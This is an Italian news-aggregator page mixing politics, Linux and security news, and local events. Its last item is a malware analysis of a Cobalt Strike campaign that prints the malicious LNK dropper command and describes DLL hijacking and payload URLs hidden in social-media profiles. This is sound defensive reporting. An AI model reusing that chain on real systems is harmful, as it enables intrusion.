Salta al contenuto principale



Pencolare

@Politica interna, europea e internazionale

Non è un buon accordo, non è neanche un accordo. Non è una vittoria e non è una capitolazione. Sui dazi l’Unione Europea è rimasta unita, ha negoziato soltanto la Commissione e ha ottenuto una limitazione dei danni, chiudendo un fronte. I danni ci saranno, a dimostrazione che i nazionalismi recidono come lamette i comuni […]
L'articolo Pencolare proviene da Fondazione Luigi Einaudi.



Gli strumenti di sicurezza informatica essenziali per il monitoraggio


@Informatica (Italy e non Italy 😁)
Mentre le minacce diventano sempre più sofisticate e le violazioni dei dati più frequenti, avvalersi di strumenti di monitoraggio della sicurezza informatica è essenziale per difendersi dalle vulnerabilità, rilevare violazioni dei dati e minacce. Ecco



GAZA. “È genocidio”: B’Tselem e Physicians for Human Rights accusano Israele


@Notizie dall'Italia e dal mondo
Rompendo un tabù, due ONG israeliane hanno puntato il dito contro lo Stato lanciando pubblicamente un'accusa gravissima che sfida la narrazione ufficiale
L'articolo GAZA. “È genocidio”: B’Tselem e Physicians for Human Rights accusano Israele proviene da



Difesa collettiva e democrazia, il legame che regge la Nato secondo Perestrello

@Notizie dall'Italia e dal mondo

Il 4 aprile 1949, i leader di 12 Paesi in Europa e Nord America presero un solenne impegno: difendersi reciprocamente e difendere i valori che condividevano. Il 18 luglio 1955, 158 parlamentari alleati si riunirono per la prima Conferenza dei membri dei





Il paradosso dell’articolo 17 del Decreto NIS: quando il “volontario” diventa obbligatorio


@Informatica (Italy e non Italy 😁)
Una contraddizione nascosta nel cuore della cyber sicurezza italiana, attraverso l'interpretazione dell'Autorità di controllo, trasforma in obbligatorio un meccanismo progettato per essere volontario, rischiando di ottenere



Linux Fu: The Cheap Macropad Conundrum


You can get cheap no-brand macropads for almost nothing now. Some of them have just a couple of keys. Others have lots of keys, knobs, and LEDs. You can spring for a name brand, and it’ll be a good bet that it runs QMK. But the cheap ones? Get ready to download Windows-only software from suspicious Google Drive accounts. Will they work with Linux? Maybe.

Of course, if you don’t mind the keypad doing whatever it normally does, that’s fine. These are little more than HID devices with USB or Bluetooth. But what do those keys send by default? You will really want a way to remap them, especially since they may just send normal characters. So now you want to reverse engineer it. That’s a lot of work. Luckily, someone already has, at least for many of the common pads based around the CH57x chips.

Open Source Configuration


Thanks to [Mikhail Trishchenkov], you can use a nice Linux tool to easily configure your macropad. You can build it from source, or get built versions for Linux, Windows, and Mac. The whole thing is written in Rust if you want to take it apart or modify it.

The configuration might not make GUI users happy, but most Linux users are just fine with editing a yaml file. The software works with lots of different pads, so you do have to explain what you have first. Then you can explain what you want.

The yaml file has several keys of interest (documented in the sample file):

  • orientation – You can ask the software to treat the pad in its normal orientation or rotated 90, 180, or 270 degrees. This only matters because it is nice to lay out the keys in the right order and you want the knobs clockwise and counterclockwise directions to make sense. Of course, you can do the mental gymnastics to set it up however you like, but this makes it easier.
  • row, columns – Different pads have different number of rows and columns. Note that this doesn’t respect your Orientation setting. So if you put any knobs to the left, the horizontal keys are the columns and the vertical keys are the rows.
  • knobs – Your pad may have knobs. Count them here.
  • layers – You define multiple layers here (but at least one). The cheaper pads only support one layer, but the nicer ones have a pushbutton and LEDs that let you cycle through a few layers of different key definitions.
  • buttons – Inside a layer, you can have a bunch of key names in brackets. Depending on the orientation, there will be one set of brackets for each column or one set for each row.
  • knobs – Also inside a layer, you can define what happens on ccw, cw, and press events for each button.


The Key


The key names are generally characters (“2” or “d”) but can also be names of keys like “play” or “ctrl-x.” You can set up multiple keys (“a+b”) and there are mouse events like “click” and “wheeldown.”

You can probably guess most keys, but if in doubt, call the configuration with the show-keys argument to get a list.

I renamed the program to macropad-tool. (ch57x-keyboard-tool was too much to type.) I didn’t realize at the time that there was another program that should work with the same pad that already uses that name.

When you have a yaml file ready, you can verify it and then, if it went well, upload it:
macropad-tool validate myconfig.yaml
macropad-tool upload myconfig.yaml

That’s It?


That’s mostly it. There were only a few problems. First, you need to reinitialize the macropad each time. Second, you probably need to be root to write to the device, which is less than handy. You probably want to do more than just keystrokes. For example, you want to have the top left button bring up, for example, Gimp. As a stretch goal, my macropad didn’t support layers, and even if it did, it isn’t handy to have to push a little button to change them. I set out to fix that — sort of.

Last Problem First

The KDE keyboard shortcut dialog can read the keys and make them do actions.
At first, I thought it would be easy to map things since I use KDE. I set the keypad up to generate F13-F25, keys you don’t normally have on most keyboards. It worked, but apparently my setup sees these keycodes as other special characters that are already mapped to things. I could have fixed it, but I decided to go a different direction.

The likelihood that you would bind something to Control+Alt+Shift+… is small. Generally, only a few odd and dangerous keystrokes use this because it takes a lot of dexterity to press all those keys.

But the macropad doesn’t care. So I set up the first key to be Control+Alt+Shift+A, followed by Control+Alt+Shift+B, and so on. Now, I can easily use the KDE keyboard shortcuts from the control panel to catch those keys and do things like launch a shell, change desktops, or whatever.

All the Rest


All the other problems hinge on one thing: it is hard to run the command to initialize the macropad unless you are root. If you had a simple command to set it up, you could easily run it on startup or at any time you wanted to reinitalize the macropad.

In addition, you could bind a key to run the configuration tool to change configurations to make a poor version of layers. Sure, there would be no indication of what layer you were in, but you could fix that a different way (for example, status text on the taskbar). While not ideal, it would be workable.

So how do we get a simple command that can easily load the macropad? There are a few choices. You could have a script owned by root that is sticky. That way, users could run it, but it could become root to configure the keyboard.

I decided to go a slightly different way. I put the tool in /usr/local/bin and the yaml files in /usr/local/share/macropad, which I created. Then I created a script. You’ll probably want to modify it.

The script calls the keypad loader with sudo. But the sudo will just prompt you, right? Well, yes. So you could make an entry in /etc/sudoers.d/99-macropad:
alw ALL=(ALL) NOPASSWD: /usr/local/bin/macropad-tool
Now you, or the script on your behalf, can run the tool with sudo and not provide a password. Since a normal user can’t change /usr/local/bin/macropad or /usr/local/bin/macropad-tool, this is reasonable.

If you prefer, you could write a udev rule to match the USB IDs of your macropad and set the permissions. Something like this:
ATTRS{idProduct}=="8840", ATTRS{idVendor}=="1189", MODE="666", GROUP="users"
If you change the permissions, change the script to not use sudo. And, of course, change the product and vendor IDs to suit your macropad, along with your group, if you need something different. However, that’s probably the best option.

Fake Layers


Since the script allows you to define different layers, you can make a switch change the layer configuration by simply running the script with a given argument on a key press. A hack, but it works. Obviously, each layer will need its own fake keys unless they provide the same function. The file /tmp/macropad-current-layer tracks the current layer, which you can show with something like a command output plasmoid.

Arrange for the script to load on startup using your choice of /etc/rc.local, systemd, or even a udev rule. Whatever you like, and that takes care of all your problems.

Did we mention how cheap these are? Good thing, because you can easily roll your own and put some good software on it like QMK.


hackaday.com/2025/07/30/linux-…

RegalBeagle reshared this.



Rilasciato il Kernel Linux 6.16. Novità e miglioramenti senza troppo effetto Woww


Lo scorso fine settimana è stata rilasciata la versione finale del kernel Linux 6.16 , tradizionalmente annunciata da Linus Torvalds in persona. Lo sviluppo è proceduto con calma, ma senza grandi innovazioni: la release si è rivelata più tecnica che sensazionale. Ciononostante, include decine di miglioramenti delle prestazioni, supporto per nuove istruzioni e miglioramenti fondamentali nell’utilizzo della memoria.

Secondo Phoronix, Linux 6.16 contiene ora oltre 38 milioni di righe di codice, distribuite su oltre 78.000 file. E’ stato svolto molto lavoro, dall’ottimizzazione di basso livello ai miglioramenti della sicurezza. Una delle modifiche più importanti è l’aggiunta del supporto per le Advanced Performance Extensions di Intel, introdotte nel 2023. Queste espandono le operazioni vettoriali e raddoppiano il numero di registri generici, ma non funzionano su tutti i processori, il che ricorda i problemi di Intel con la frammentazione del supporto.

Anche i file system hanno ricevuto un incremento delle prestazioni. XFS ha aggiunto scritture atomiche estese mentre ext4 ha acquisito il supporto per bigalloc e large folio, che in alcuni scenari velocizza le operazioni di quasi un terzo. I miglioramenti hanno interessato sia Btrfs che NFS. Anche il meccanismo di core dump è stato modificato : ora i dump della memoria possono essere trasmessi tramite AF_SOCKET, anziché essere salvati solo in una directory. Questo aumenta la flessibilità e la sicurezza durante il debug.

Per i sistemi server NUMA, è stata aggiunta la funzione di auto-ottimizzazione automatica, una funzionalità importante per la distribuzione del carico tra i nodi di memoria. Inoltre, il kernel ora supporta tabelle di pagina a cinque livelli, aprendo la strada a quantità colossali di memoria virtuale. Per le soluzioni e i dispositivi embedded con risorse limitate, un’importante innovazione è la possibilità di delegare la decodifica audio ai chip USB, in fase di sviluppo da diversi anni e finalmente implementata, soprattutto per le piattaforme Qualcomm .

Una panoramica completa delle innovazioni è pubblicata in due parti su LWN: prima parte, seconda parte e un riassunto. È disponibile anche una breve descrizione su kernelnewbies.org, per chi desidera familiarizzare rapidamente con i punti principali.

Torvalds ha avvertito che sarebbe stato in viaggio durante il rilascio della versione Linux 6.17. Questo potrebbe causare ritardi. Sembra un avviso organizzativo, ma ci ricorda anche che il destino del kernel Linux dipende ancora in gran parte da una sola persona.

L'articolo Rilasciato il Kernel Linux 6.16. Novità e miglioramenti senza troppo effetto Woww proviene da il blog della sicurezza informatica.



The massive Tea breach; how the UK's age verification law is impacting access to information; and LeBron James' AI-related cease-and-desist.

The massive Tea breach; how the UKx27;s age verification law is impacting access to information; and LeBron Jamesx27; AI-related cease-and-desist.#Podcast



Orange segnala grave incidente di sicurezza in Francia. Nelle underground messi in vendita 6000 record


La società francese di telecomunicazioni Orange, che serve quasi 300 milioni di clienti in tutto il mondo, ha segnalato un grave incidente di sicurezza che ha causato interruzioni ai servizi chiave in Francia. L’incidente è stato rilevato la sera del 25 luglio dagli specialisti della divisione Cyberdefense di Orange, dopodiché il sistema interessato è stato immediatamente isolato dal resto dell’infrastruttura.

Nonostante la rapida risposta, la localizzazione della minaccia ha causato interruzioni temporanee nel funzionamento delle piattaforme aziendali e dei servizi individuali per i consumatori, incluso l’accesso alla gestione dei servizi e alle funzioni amministrative interne.

Le interruzioni hanno interessato principalmente i clienti in Francia. Si prevede che il pieno ripristino delle normali attività avverrà oggi stesso.

Dal monitoraggio delle underground criminali, nella giornata del 28 luglio è emersa la pubblicazione, all’interno di un forum underground, di un annuncio da parte di un threat actor che ha messo in vendita oltre 6.000 record appartenenti a Orange Moldova.

Dopo aver scoperto l’attacco, i rappresentanti di Orange hanno contattato le autorità competenti e hanno intentato una causa ufficiale, ma non è ancora stato reso noto quali vettori siano stati utilizzati dagli aggressori. L’azienda sottolinea che, allo stato attuale delle indagini, non vi sono segnali di fuga di dati degli utenti o furto di informazioni riservate.

L’incidente in sé presenta molte somiglianze con un’ondata di attacchi contro aziende di telecomunicazioni precedentemente condotta dal gruppo cinese Salt Typhoon, noto per i rapporti della CISA e dell’FBI per attacchi contro operatori di telecomunicazioni negli Stati Uniti e all’estero. Tra i soggetti interessati da queste operazioni su larga scala figurano AT&T, T-Mobile, Verizon, Lumen, Windstream e altre grandi aziende di telecomunicazioni, nonché fornitori di servizi satellitari come Viasat .

È interessante notare che questo è il secondo attacco a Orange negli ultimi sei mesi. Nel febbraio 2025, un hacker che utilizzava lo pseudonimo Rey aveva segnalato la compromissione dell’infrastruttura della divisione rumena dell’azienda. All’epoca, si trattava di accesso a documenti interni, codici, contratti, indirizzi email e dati dei dipendenti, tra cui fonti che affermavano il furto di oltre 380.000 indirizzi email. L’azienda ha riconosciuto l’attacco a un’applicazione ausiliaria, ma ha insistito sul fatto che elementi critici dell’infrastruttura non erano stati interessati.

Orange detiene una posizione dominante in Europa, Africa e Medio Oriente, fornendo servizi di comunicazione mobile, banda larga e cloud alle aziende. Nel 2024, l’azienda serviva 256 milioni di clienti di telefonia mobile e 22 milioni di telefonia fissa, con oltre 125.000 dipendenti e registrando un fatturato annuo di 40,3 miliardi di euro.

L’attacco attuale, nonostante l’assenza di una fuga di dati confermata, resta altamente preoccupante: la minaccia di una ripetizione di campagne di spionaggio su larga scala resta reale, soprattutto data la delicatezza dell’infrastruttura delle telecomunicazioni e la portata internazionale delle operazioni di Orange.

L'articolo Orange segnala grave incidente di sicurezza in Francia. Nelle underground messi in vendita 6000 record proviene da il blog della sicurezza informatica.



Terremoto in Kamčatka, tsunami nel Pacifico. Situazione sotto controllo per i cavi sottomarini


Un terremoto di magnitudo 8,8 ha colpito la mattina del 30 luglio ora locale (09:24:50 UTC+10:00) al largo della costa orientale della Russia, innescando uno tsunami che ha attraversato l’Oceano Pacifico. Secondo l’US Geological Survey (USGS), il terremoto è stato uno dei sei più potenti dal 1900. Il suo epicentro è stato nel Mare di Okhotsk, e si colloca al sesto posto nella lista dei terremoti più forti.

In seguito alle scosse, i paesi del Pacifico hanno iniziato a emettere allerte tsunami. Negli Stati Uniti, il Servizio Meteorologico Nazionale ha consigliato ai residenti lungo l’intera costa occidentale di essere in stato di allerta. In Giappone, le autorità hanno ordinato l’evacuazione immediata dei residenti delle zone costiere basse.

Secondo la BBC, in Giappone sono state registrate onde alte fino a 30 cm. Tuttavia, al momento della pubblicazione, non sono stati segnalati danni o interruzioni alle infrastrutture digitali, comprese quelle di telecomunicazioni, piattaforme cloud e fabbriche di microchip.

Il cavo sottomarino Petropavlovsk-Kamchatsky-Anadyr della Rostelecom, che corre vicino all’epicentro, è potenzialmente vulnerabile, ma l’operatore non ha ancora pubblicato alcuna informazione su possibili guasti. Anche le principali piattaforme cloud, come AWS, Azure e Google, non hanno subito interruzioni. Secondo le pagine di stato, i loro data center in Giappone e in altre regioni funzionano normalmente.

Alla luce degli eventi, gli utenti hanno ricordato il devastante tsunami del 2011 che danneggiò la centrale nucleare di Fukushima. Il gestore dell’impianto, la TEPCO, ha annunciato di aver evacuato il personale e sospeso temporaneamente lo scarico delle acque trattate rimaste inutilizzate da quel momento.

A sud dell’epicentro si trovano numerosi cavi sottomarini e, se il fronte d’onda dovesse intensificarsi, il loro funzionamento potrebbe subire interruzioni.

L'articolo Terremoto in Kamčatka, tsunami nel Pacifico. Situazione sotto controllo per i cavi sottomarini proviene da il blog della sicurezza informatica.



Stampa Romana su precari Rai: aprire riflessione su sindacato e rappresentanza 


Il ricorso sistematico al precariato, a rapporti di lavoro regolati senza la giusta applicazione del contratto di collettivo dei giornalisti sono ferite gravi inferte dagli editori alla nostra professione, strumenti con i quali si è indebolita l’intera categoria. Per il riscatto occorre coesione e un sindacato inclusivo che garantisca piena e adeguata rappresentanza. Per questo, nel rispetto dell’autonomia di tutte le articolazioni della Fnsi, la richiesta dei colleghi Rai precari e in attesa del “giusto contratto” di potersi iscrivere all’Usigrai, cosa che lo statuto attuale non consente, deve essere l’occasione di una seria riflessione. Regole che diano a tutti i colleghi una equa e proporzionata forza di rappresentanza indipendentemente da dove svolgano la professione, (testate, programmi, ambito nazionale o regionale) sono la migliore risposta a chi ha sciaguratamente scelto la via della scissione, danneggiando, per il vantaggio di pochissimi, il sindacato e l’intera categoria.

La Segreteria dell’Associazione Stampa Romana


dicorinto.it/associazionismo/s…



si dice che la storia la facciano i vincitori, ma in realtà la fa chi sopravvive. pensateci prima di dire che il morbillo, il covid, o tutte le malattie non fanno male e sono una invenzione di "big pharma". lo potete dire solo perché i morti non parlano, mentre chi ha avuto fortuna si. solo perché nessuno vi può smentire non significa che abbiate ragione.


Firenze, regalo libri per bambini


@Il Fedimercatino / Flohmarkt /Flohra
@Firenze

Regalo libri per bambini (4-6 anni) a chi se li viene a prendere. Tutti in ottimo stato.

Firenze, zona Ponte a Greve/Casellina.

Rispondetemi sul mio account di poliverso.org altrimenti non è detto che veda il messaggio.



#Presentazione time!

Sono Benedetta (she/her), una neurospicy transfem aspirante pilota di mech, approdo su Friendica per capire quale possa essere la regione del Fediverso più adatta al mio progettino di #selfhosting (al momento sono principalmente su Mastodon).

Il mio mestiere (e passione) sono i disegnetti, sperando prima o poi di riuscire a fare #fumetti e #comics, ma mi piacciono anche gli #rpg sia da tavolo sia #videogame, la #F1 e un sacco di altre robe. Parlerò probabilmente perlopiù di questo, e della mia vita quotidiana se capita.

Al momento ho iniziato una newsletter per provare a dare ordine a quello che faccio e vivo e parlarne, mi piacerebbe riuscire a stabilire un contatto con le persone (e magari portarle sul fediverso).

Free Palestine, trans rights are human rights, antifa sempre, ma insomma queste sono le basi 👀



Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Sabato 9 agosto 2025 – ore 21.00 – Alghero (SS)

Dopo la tappa di Quartu Sant’Elena, prosegue ad Alghero l’appuntamento con “Una dose di realtà”, un incontro pubblico dedicato al rapporto tra salute mentale, scienza e politiche sulle terapie psichedeliche.

L’evento si terrà sabato 9 agosto 2025 alle ore 21.00, presso il Ristorante Movida, in Piazza S. Erasmo 9/C, Alghero.
Ingresso gratuito. Seguirà un’apericena di autofinanziamento di euro 24 presso lo stesso ristorante, dalle ore 22:00. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni. Per prenotare l’apericena telefonare al numero 079 974 589


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Giulia Giglio, Cellula Sardegna dell’Associazione Luca Coscioni

Saluti istituzionali:

  • Valdo Di Nolfo, Consigliere Regionale

L’iniziativa è realizzata in collaborazione con la libreria Il Labirinto Mondadori Bookstore e con il patrocinio di:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Quelli da Coscioni Sardegna.

L'articolo Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Giovedì 7 agosto 2025 – ore 19.30 – Iglesias (SU)

Il ciclo di incontri pubblici dedicati a salute mentale e terapie psichedeliche fa tappa a Iglesias con l’iniziativa “Una dose di realtà”, un momento di confronto tra esperti, attivisti e istituzioni su scienza, politiche pubbliche e libertà di ricerca.

L’evento si terrà giovedì 7 agosto 2025 alle ore 19.30, presso la Sala Remo Branca del Palazzo Municipale di Iglesias, in Piazza Municipio. Con il patrocinio del Comune di Iglesias. Seguirà alle 21.30 un aperitivo di autofinanziamento, di cui una parte del ricavato sarà devoluta ad Associazione Luca Coscioni, presso il Bar Ex Farmacia, Piazza Pichi 1. La prenotazione è obbligatoria al numero 347 877 6481.


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Carla Mura, Giornalista

Saluti istituzionali a cura dell’Amministrazione comunale di Iglesias

L’iniziativa è promossa da:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna

L'articolo Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Venerdì 8 agosto 2025 – ore 19.30 – Quartu Sant’Elena (CA)

L’appuntamento si terrà venerdì 8 agosto 2025, alle ore 19.30, presso lo Spazio Michelangelo Pira, in via Brigata Sassari 10, Quartu Sant’Elena (CA). Ingresso gratuito. Seguirà alle 21.30 un aperitivo di autofinanziamento presso l’EGO Cafè Bar Lounge, Via Brigata Sassari 25. La prenotazione è obbligatoria al numero 070 204 2710. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni.


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Carla Mura, Giornalista

Saluti istituzionali:

  • Graziano Milia, Sindaco di Quartu Sant’Elena

L’evento è promosso dal Comune di Quartu Sant’Elena, e in collaborazione con: Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna.

L'articolo A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



Everyone’s Invited to the Copyparty


Setting up a file server can be intimidating to the uninitiated. There are many servers to choose from, and then you need to decide how to install it — Docker? Kubernates? Well, what’s all that then? [9001] has come to the rescue with Copyparty, a full-featured file server in a single Python script.

It’s light enough to run on nearly anything, and getting it running could not be easier: run copyparty-sfx.py, and you’ve got a server. There’s even a 32-bit .exe for older Windows machines — Windows 2000 seems to be the oldest version tested.
Browsers supported: almost all of them.
It’ll connect to anything, both in terms of the variety of protocols supported, and the browsers its web interface loads in. The GitHub documentation says browser support : “Yes”, which is pretty accurate going down the list. Sadly Copyparty’s pages do not work in NACA Mosaic, but IE4 is A-OK.

There’s, FTP, TFTP, HTTP/HTTPS, WebDAV, SMB/CIFS, with unp/zeroconf/mdns/ssdp, etc etc. You need to check the readme for all features, some of which — like transcoding — are only available when dependencies such as ffmpeg installed on the server. Alternatively you can watch the video embedded below to get walked through the features. If the video whets your appetite, can also visit a read-only Copyparty server being demoed on a NUC sitting in [9001]’s basement.

Over the years we’ve seen plenty of folks create personal servers, but the focus is generally on the hardware side of things. While those with more software experience might prefer to configure the various services involved manually, we can definitely see the appeal of a project like Copyparty. In some ways it’s the inverse of the UNIX Philosophy: instead of doing one thing perfectly, this program is doing everything [9001] could think of, and doing it “good enough”.

Thanks to [pedropolis] for inviting us to the Copyparty via the tips line. Building a NAS? Writing software? Hardware?Whatever you do, the tips line is for you.

youtube.com/embed/15_-hgsX2V0?…


hackaday.com/2025/07/30/everyo…



Start-ups in der Rüstungsbranche: „Man kann hier von einem neuen militärisch-industriellen Komplex sprechen“


netzpolitik.org/2025/start-ups…



Perché il Garante pizzica Meta per l’IA su Whatsapp

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
L’Autorità garante della concorrenza e del mercato (Agcm) ha avviato un'istruttoria nei confronti di Meta per presunto abuso di posizione dominante. C'entra la decisione di pre-installare il proprio servizio di intelligenza

reshared this



Cobalt Strike Beacon delivered via GitHub and social media



Introduction


In the latter half of 2024, the Russian IT industry, alongside a number of entities in other countries, experienced a notable cyberattack. The attackers employed a range of malicious techniques to trick security systems and remain undetected. To bypass detection, they delivered information about their payload via profiles on both Russian and international social media platforms, as well as other popular sites supporting user-generated content. The samples we analyzed communicated with GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks. The attackers thus aimed to conceal their activities and establish a complex execution chain for the long-known and widely used Cobalt Strike Beacon.

Although the campaign was most active during November and December 2024, it continued until April 2025. After a two-month silence, our security solutions began detecting attacks again. The adversary employed new malicious samples, which were only slightly modified versions of those described in the article.

Kaspersky solutions detect this threat and assign the following verdicts:

  • HEUR:Trojan.Win64.Agent.gen
  • HEUR:Trojan.Win64.Kryptik.gen
  • HEUR:Trojan.WinLNK.Starter.gen
  • MEM:Trojan.Multi.Cobalt.gen
  • HEUR:Trojan.Win32.CobaltStrike.gen


Initial attack vector


The initial attack vector involved spear phishing emails with malicious attachments. The emails were disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector. The attackers feigned interest in the victims’ products and services to create a convincing illusion of legitimacy and increase the likelihood of the recipient opening the malicious attachment.

Sample spear phishing email
Sample spear phishing email

All attachments we observed were RAR archives with the following structure:

  • Требования.lnk
  • Требования
    • Company Profile.pdf
    • List of requirements.pdf
    • Требования
      • pdf
      • pdf



Company profile.pdf and List of requirements.pdf were decoy files designed to complement the information in the email. The directory Требования\Требования contained executables named Company.pdf and Requirements.pdf, designed to mimic secure PDF documents. The directory itself was hidden, invisible to the user by default.

When Требования.lnk was opened, the files in Требования\Требования were copied to %public%\Downloads\ and renamed: Company.pdf became nau.exe, and Requirements.pdf became BugSplatRc64.dll. Immediately afterward, nau.exe was executed.
%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\

& start %cd%\Требования

& ren %public%\Downloads\Company.pdf nau.exe

& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll

& %public%\Downloads\nau.exe
Contents of Требования.lnk

Требования.lnk execution sequence
Требования.lnk execution sequence

Malicious agent


Process flow diagram for nau.exe
Process flow diagram for nau.exe

In this attack, the adversary leveraged a common technique: DLL Hijacking (T1574.001). To deploy their malicious payload, they exploited the legitimate Crash reporting Send Utility (original filename: BsSndRpt.exe). The tool is part of BugSplat, which helps developers get detailed, real-time crash reports for their applications. This was the utility that the attackers renamed from Company.pdf to nau.exe.

For BsSndRpt.exe to function correctly, it requires BugSplatRc64.dll. The attackers saved their malicious file with that name, forcing the utility to load it instead of the legitimate file.

To further evade detection, the malicious BugSplatRc64.dll library employs Dynamic API Resolution (T1027.007). This technique involves obscuring API functions within the code, resolving them dynamically only during execution. In this specific case, the functions were obfuscated via a custom hashing algorithm, which shares similarities with CRC (Cyclic Redundancy Check).

Hashing algorithm
Hashing algorithm

A significant portion of the hashes within the malicious sample are XOR-encrypted. Additionally, after each call, the address is removed from memory, and API functions are reloaded if a subsequent call is needed.

MessageBoxW function hook


The primary purpose of BugSplatRc64.dll is to intercept API calls within the legitimate utility’s process address space to execute its malicious code (DLL Substitution, T1574.001). Instead of one of the API functions required by the process, a call is made to a function (which we’ll refer to as NewMessageBox) located within the malicious library’s address space. This technique makes it difficult to detect the malware in a sandbox environment, as the library won’t launch without a specific executable file. In most of the samples we’ve found, the MessageBoxW function call is modified, though we’ve also discovered samples that altered other API calls.

Hooking MessageBoxW
Hooking MessageBoxW

After modifying the intercepted function, the library returns control to the legitimate nau.exe process.

NewMessageBox function


Once the hook is in place, whenever MessageBoxW (or another modified function) is called within the legitimate process, NewMessageBox executes. Its primary role is to run a shellcode, which is loaded in two stages.

First, the executable retrieves HTML content from a webpage located at one of the addresses encrypted within the malicious library. In the sample we analyzed, these addresses were techcommunity.microsoft[.]com/… and quora[.]com/profile/Marieforma…. The information found at both locations is identical. The second address serves as a backup if the first one becomes inactive.

NewMessageBox searches the HTML code retrieved from these addresses for a string whose beginning and end match patterns that are defined in the code and consist of mixed-case alphanumeric characters. This technique allows attackers to leverage various popular websites for storing these strings. We’ve found malicious information hidden inside profiles on GitHub, Microsoft Learn Challenge, Q&A websites, and even Russian social media platforms.

Malicious profiles on popular online platforms
Malicious profiles on popular online platforms

While we didn’t find any evidence of the attackers using real people’s social media profiles, as all the accounts were created specifically for this attack, aligning with MITRE ATT&CK technique T1585.001, there’s nothing stopping the threat actor from abusing various mechanisms these platforms provide. For instance, malicious content strings could be posted in comments on legitimate users’ posts.

The extracted payload is a base64-encoded string with XOR-encrypted data. Decrypted, this data reveals the URL raw.githubusercontent[.]com/Ma…, which then downloads another XOR-encrypted shellcode.

We initially expected NewMessageBox to execute the shellcode immediately after decryption. Instead, nau.exe launches a child process with the same name and the qstt parameter, in which all of the above actions are repeated once again, ultimately resulting in the execution of the shellcode.

Shellcode


An analysis of the shellcode (793453624aba82c8e980ca168c60837d) reveals a reflective loader that injects Cobalt Strike Beacon into the process memory and then hands over control to it (T1620).

The observed Cobalt sample communicates with the C2 server at moeodincovo[.]com/divide/mail/SUVVJRQO8QRC.

Attribution and victims


The method used to retrieve the shellcode download address is similar to the C2 acquisition pattern that our fellow security analysts observed in the EastWind campaign. In both cases, the URL is stored in a specially crafted profile on a legitimate online platform like Quora or GitHub. In both instances, it’s also encrypted using an XOR algorithm. Furthermore, the targets of the two campaigns partially overlap: both groups of attackers show interest in Russian IT companies.

It’s worth mentioning that while most of the attacks targeted Russian companies, we also found evidence of the malicious activity in China, Japan, Malaysia, and Peru. The majority of the victims were large and medium-sized businesses.

Takeaways


Threat actors are using increasingly complex and clever methods to conceal long-known tools. The campaign described here used techniques like DLL hijacking, which is gaining popularity among attackers, as well as obfuscating API calls within the malicious library and using legitimate resources like Quora, GitHub, and Microsoft Learn Challenge to host C2 addresses. We recommend that organizations adhere to the following guidelines to stay safe:

  • Track the status of their infrastructure and continuously monitor their perimeter.
  • Use powerful security solutions to detect and block malware embedded within bulk email.
  • Train their staff to increase cybersecurity awareness.
  • Secure corporate devices with a comprehensive system that detects and blocks attacks in the early stages.

You can detect the malware described here by searching for the unsigned file BugSplatRc64.dll in the file system. Another indirect sign of an attack could be the presence of Crash reporting Send Utility with any filename other than the original BsSndRpt.exe.

IOCs:


LNK
30D11958BFD72FB63751E8F8113A9B04
92481228C18C336233D242DA5F73E2D5

Legitimate BugSplat.exe
633F88B60C96F579AF1A71F2D59B4566

DLL
2FF63CACF26ADC536CD177017EA7A369
08FB7BD0BB1785B67166590AD7F99FD2
02876AF791D3593F2729B1FE4F058200
